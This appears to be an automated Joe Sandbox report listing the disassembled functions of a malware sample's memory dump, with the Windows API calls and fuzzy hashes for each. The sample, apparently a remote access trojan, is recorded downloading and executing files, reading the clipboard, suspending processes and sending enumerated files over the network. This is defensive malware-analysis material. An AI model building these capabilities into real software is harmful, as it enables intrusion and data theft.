                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                          • String ID:
                                                                                          • API String ID: 745075371-0
                                                                                          • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                          • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                          • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                          • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                          Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 0040884C
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                          • String ID:
                                                                                          • API String ID: 1771804793-0
                                                                                          • Opcode ID: 2aff72510e3da79c4ec0127435383929a3d65dfb18998d25a11cc0f49d42b15d
                                                                                          • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                                          • Opcode Fuzzy Hash: 2aff72510e3da79c4ec0127435383929a3d65dfb18998d25a11cc0f49d42b15d
                                                                                          • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                                          Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DownloadExecuteFileShell
                                                                                          • String ID: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe$open
                                                                                          • API String ID: 2825088817-930619648
                                                                                          • Opcode ID: 9e0075f8649e8eb678af43effba4d9cb246f45d30d692757a256b35a196f2dac
                                                                                          • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                                          • Opcode Fuzzy Hash: 9e0075f8649e8eb678af43effba4d9cb246f45d30d692757a256b35a196f2dac
                                                                                          • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                                          Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                            • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                            • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
                                                                                            • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateInfoParametersSystemValue
                                                                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                          • API String ID: 4127273184-3576401099
                                                                                          • Opcode ID: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
                                                                                          • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                          • Opcode Fuzzy Hash: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
                                                                                          • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                          Function 0041CA6D Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                            • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                            • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
                                                                                            • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateInfoParametersSystemValue
                                                                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                          • API String ID: 4127273184-3576401099
                                                                                          • Opcode ID: 44ea0df9bd10d1232a8db12fadab67e0168899acaa20bfaa619f1365e862af88
                                                                                          • Instruction ID: 1d4fccf664b116fd7e9026c1daa93839c24cbfeedf45b0e65449f5778d70c30d
                                                                                          • Opcode Fuzzy Hash: 44ea0df9bd10d1232a8db12fadab67e0168899acaa20bfaa619f1365e862af88
                                                                                          • Instruction Fuzzy Hash: DBF0C272BC421022D82931B96DAFBFE18058742F61F15412BF302652CAD4CE6A81428F
                                                                                          Function 00451D58 Relevance: 6.2, APIs: 4, Instructions: 236COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00451E3A
                                                                                          • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                                                          • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00451F7B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 4212172061-0
                                                                                          • Opcode ID: 715b93ef3f017ee4fea0110e94a068843382a27aff4af5d2daf4b4fdd25eb79d
                                                                                          • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                                          • Opcode Fuzzy Hash: 715b93ef3f017ee4fea0110e94a068843382a27aff4af5d2daf4b4fdd25eb79d
                                                                                          • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                                          Function 0044942D Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 0044943D
                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                          • GetTimeZoneInformation.KERNEL32 ref: 0044944F
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,?,00472764,000000FF,?,0000003F,?,?), ref: 004494C7
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,?,004727B8,000000FF,?,0000003F,?,?,?,00472764,000000FF,?,0000003F,?,?), ref: 004494F4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                          • String ID:
                                                                                          • API String ID: 806657224-0
                                                                                          • Opcode ID: aeb37be2ef55a5d103ab6b4be93faccb032caed00e04dd613037f001c8cf3bb4
                                                                                          • Instruction ID: d52e19fe16dfdee109f40d049db845c42e01460133d57766726f1505d2785bee
                                                                                          • Opcode Fuzzy Hash: aeb37be2ef55a5d103ab6b4be93faccb032caed00e04dd613037f001c8cf3bb4
                                                                                          • Instruction Fuzzy Hash: 2D31F371904205EFDB15DF69CE8186EBBB8FF0572072446AFE024A73A1D3748D41EB28
                                                                                          Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                          • String ID:
                                                                                          • API String ID: 2829624132-0
                                                                                          • Opcode ID: 711793eb573856c12bfad09b44d2354213151b00c391b4c97ce46ce3e25352d9
                                                                                          • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                          • Opcode Fuzzy Hash: 711793eb573856c12bfad09b44d2354213151b00c391b4c97ce46ce3e25352d9
                                                                                          • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                                          Function 0043BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                          • String ID:
                                                                                          • API String ID: 3906539128-0
                                                                                          • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                          • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                                          • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                          • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                                          Function 00443355 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                          • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                          • ExitProcess.KERNEL32 ref: 0044338F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                          • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                          • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                          • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                          Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                                                          • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                                                          • CloseClipboard.USER32 ref: 0040B760
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Clipboard$CloseDataOpen
                                                                                          • String ID:
                                                                                          • API String ID: 2058664381-0
                                                                                          • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                          • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                          • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                          • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                          Function 0041BBC6 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                                          • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,0041605F,00000000), ref: 0041BBE7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CloseHandleOpenResume
                                                                                          • String ID:
                                                                                          • API String ID: 3614150671-0
                                                                                          • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                          • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                                                                          • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                          • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                                                          Function 0041BB9A Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                                                          • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,0041603A,00000000), ref: 0041BBBB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CloseHandleOpenSuspend
                                                                                          • String ID:
                                                                                          • API String ID: 1999457699-0
                                                                                          • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                          • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                                                          • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                          • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                                                                          Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: GetLocaleInfoEx
                                                                                          • API String ID: 2299586839-2904428671
                                                                                          • Opcode ID: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                                                          • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                                          • Opcode Fuzzy Hash: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                                                          • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                                          Function 00419B86 Relevance: 3.2, APIs: 2, Instructions: 245fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Find$CreateFirstNext
                                                                                          • String ID:
                                                                                          • API String ID: 341183262-0
                                                                                          • Opcode ID: 033e8258890fc957befca486fec0129e52369d73b464bfe1319a74ee7ff91c24
                                                                                          • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                                          • Opcode Fuzzy Hash: 033e8258890fc957befca486fec0129e52369d73b464bfe1319a74ee7ff91c24
                                                                                          • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                          Function 00407877 Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileFind$FirstNextsend
                                                                                          • String ID:
                                                                                          • API String ID: 4113138495-0
                                                                                          • Opcode ID: c10402a11411eb67977763d9ee290a3a58eac94241b7fce9268609e1d0d0fe6c
                                                                                          • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                                          • Opcode Fuzzy Hash: c10402a11411eb67977763d9ee290a3a58eac94241b7fce9268609e1d0d0fe6c
                                                                                          • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                                          Function 004120B2 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Heap$FreeProcess
                                                                                          • String ID:
                                                                                          • API String ID: 3859560861-0
                                                                                          • Opcode ID: dd2f45b1bfdeb7a1a5420288e71913fa42d02de7f124d91d2f4ae112c61c3ef1
                                                                                          • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                                                                          • Opcode Fuzzy Hash: dd2f45b1bfdeb7a1a5420288e71913fa42d02de7f124d91d2f4ae112c61c3ef1
                                                                                          • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                                                                          Function 00434CB6 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FeaturePresentProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 2325560087-0
                                                                                          • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                          • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                                          • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                          • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                                          Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
